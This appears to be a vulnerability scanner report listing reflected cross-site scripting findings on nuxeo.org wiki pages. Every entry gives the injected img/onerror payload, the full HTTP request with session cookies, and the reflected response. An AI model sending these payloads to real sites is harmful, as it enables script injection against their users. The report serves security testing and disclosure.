HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:26 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12898 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main8c472%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E24ed474cd68/Tags?format=xar&name=Main8c472"><img src=a onerror=alert(1)>24ed474cd68.Tags&pages=Main8c472"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2faea<img%20src%3da%20onerror%3dalert(1)>80fd4319524 was submitted in the REST URL parameter 4. This input was echoed as 2faea<img src=a onerror=alert(1)>80fd4319524 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main2faea<img%20src%3da%20onerror%3dalert(1)>80fd4319524/Tags HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:21 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12832 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main2faea%3Cimg+src%3Da+onerror%3Dalert%281%29%3E80fd4319524/">Main2faea<img src=a onerror=alert(1)>80fd4319524</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f901e<img%20src%3da%20onerror%3dalert(1)>63acc2cbc28 was submitted in the REST URL parameter 5. This input was echoed as f901e<img src=a onerror=alert(1)>63acc2cbc28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Tagsf901e<img%20src%3da%20onerror%3dalert(1)>63acc2cbc28 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:59 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12820 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/Tagsf901e%3Cimg+src%3Da+onerror%3Dalert%281%29%3E63acc2cbc28'>Tagsf901e<img src=a onerror=alert(1)>63acc2cbc28</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0e5"><img%20src%3da%20onerror%3dalert(1)>430e2cf64ed was submitted in the REST URL parameter 5. This input was echoed as 7d0e5"><img src=a onerror=alert(1)>430e2cf64ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Tags7d0e5"><img%20src%3da%20onerror%3dalert(1)>430e2cf64ed HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:05 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12882 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/Tags7d0e5%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E430e2cf64ed?format=xar&name=Main.Tags7d0e5"><img src=a onerror=alert(1)>430e2cf64ed&pages=Main.Tags7d0e5"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f0e56<img%20src%3da%20onerror%3dalert(1)>8311f0b5e3a was submitted in the REST URL parameter 4. This input was echoed as f0e56<img src=a onerror=alert(1)>8311f0b5e3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Mainf0e56<img%20src%3da%20onerror%3dalert(1)>8311f0b5e3a/Understanding+JBoss+Directories HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:19 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13187 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Mainf0e56%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8311f0b5e3a/">Mainf0e56<img src=a onerror=alert(1)>8311f0b5e3a</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1aa"><img%20src%3da%20onerror%3dalert(1)>c2cf5c63703 was submitted in the REST URL parameter 4. This input was echoed as be1aa"><img src=a onerror=alert(1)>c2cf5c63703 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Mainbe1aa"><img%20src%3da%20onerror%3dalert(1)>c2cf5c63703/Understanding+JBoss+Directories HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:33 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13253 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Mainbe1aa%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec2cf5c63703/Understanding+JBoss+Directories?format=xar&name=Mainbe1aa"><img src=a onerror=alert(1)>c2cf5c63703.Understanding JBoss Directories&pages=Mainbe1aa"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e87d7"><img%20src%3da%20onerror%3dalert(1)>89b0697bfae was submitted in the REST URL parameter 5. This input was echoed as e87d7"><img src=a onerror=alert(1)>89b0697bfae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Understanding+JBoss+Directoriese87d7"><img%20src%3da%20onerror%3dalert(1)>89b0697bfae HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:49 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13237 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... a href="http://www.nuxeo.org/xwiki/bin/export/Main/Understanding+JBoss+Directoriese87d7%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E89b0697bfae?format=xar&name=Main.Understanding JBoss Directoriese87d7"><img src=a onerror=alert(1)>89b0697bfae&pages=Main.Understanding JBoss Directoriese87d7"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a2dfb<img%20src%3da%20onerror%3dalert(1)>c65f4a3268c was submitted in the REST URL parameter 5. This input was echoed as a2dfb<img src=a onerror=alert(1)>c65f4a3268c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Understanding+JBoss+Directoriesa2dfb<img%20src%3da%20onerror%3dalert(1)>c65f4a3268c HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:50 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13175 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directoriesa2dfb%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec65f4a3268c'>Understanding JBoss Directoriesa2dfb<img src=a onerror=alert(1)>c65f4a3268c</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eab17<img%20src%3da%20onerror%3dalert(1)>123105c7679 was submitted in the REST URL parameter 4. This input was echoed as eab17<img src=a onerror=alert(1)>123105c7679 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Maineab17<img%20src%3da%20onerror%3dalert(1)>123105c7679/Using+Nuxeo+API HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:35 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12979 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Maineab17%3Cimg+src%3Da+onerror%3Dalert%281%29%3E123105c7679/">Maineab17<img src=a onerror=alert(1)>123105c7679</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49dbe"><img%20src%3da%20onerror%3dalert(1)>8944e5657f5 was submitted in the REST URL parameter 4. This input was echoed as 49dbe"><img src=a onerror=alert(1)>8944e5657f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main49dbe"><img%20src%3da%20onerror%3dalert(1)>8944e5657f5/Using+Nuxeo+API HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:11 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13045 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main49dbe%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8944e5657f5/Using+Nuxeo+API?format=xar&name=Main49dbe"><img src=a onerror=alert(1)>8944e5657f5.Using Nuxeo API&pages=Main49dbe"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50755"><img%20src%3da%20onerror%3dalert(1)>95dc43f2514 was submitted in the REST URL parameter 5. This input was echoed as 50755"><img src=a onerror=alert(1)>95dc43f2514 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Using+Nuxeo+API50755"><img%20src%3da%20onerror%3dalert(1)>95dc43f2514 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:28 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13029 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/Using+Nuxeo+API50755%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E95dc43f2514?format=xar&name=Main.Using Nuxeo API50755"><img src=a onerror=alert(1)>95dc43f2514&pages=Main.Using Nuxeo API50755"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5e592<img%20src%3da%20onerror%3dalert(1)>203fdc532cf was submitted in the REST URL parameter 5. This input was echoed as 5e592<img src=a onerror=alert(1)>203fdc532cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Using+Nuxeo+API5e592<img%20src%3da%20onerror%3dalert(1)>203fdc532cf HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:06 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12967 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API5e592%3Cimg+src%3Da+onerror%3Dalert%281%29%3E203fdc532cf'>Using Nuxeo API5e592<img src=a onerror=alert(1)>203fdc532cf</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cb09"><img%20src%3da%20onerror%3dalert(1)>27e195a34ef was submitted in the REST URL parameter 4. This input was echoed as 7cb09"><img src=a onerror=alert(1)>27e195a34ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main7cb09"><img%20src%3da%20onerror%3dalert(1)>27e195a34ef/WebRss HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:12:50 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12924 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main7cb09%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E27e195a34ef/WebRss?format=xar&name=Main7cb09"><img src=a onerror=alert(1)>27e195a34ef.WebRss&pages=Main7cb09"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 76490<img%20src%3da%20onerror%3dalert(1)>4484ac9bb2 was submitted in the REST URL parameter 4. This input was echoed as 76490<img src=a onerror=alert(1)>4484ac9bb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main76490<img%20src%3da%20onerror%3dalert(1)>4484ac9bb2/WebRss HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:34 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12845 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main76490%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4484ac9bb2/">Main76490<img src=a onerror=alert(1)>4484ac9bb2</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cbc6a<img%20src%3da%20onerror%3dalert(1)>c41e6b9b885 was submitted in the REST URL parameter 5. This input was echoed as cbc6a<img src=a onerror=alert(1)>c41e6b9b885 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/WebRsscbc6a<img%20src%3da%20onerror%3dalert(1)>c41e6b9b885 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:01 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12846 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/WebRsscbc6a%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec41e6b9b885'>WebRsscbc6a<img src=a onerror=alert(1)>c41e6b9b885</a> ...[SNIP]...
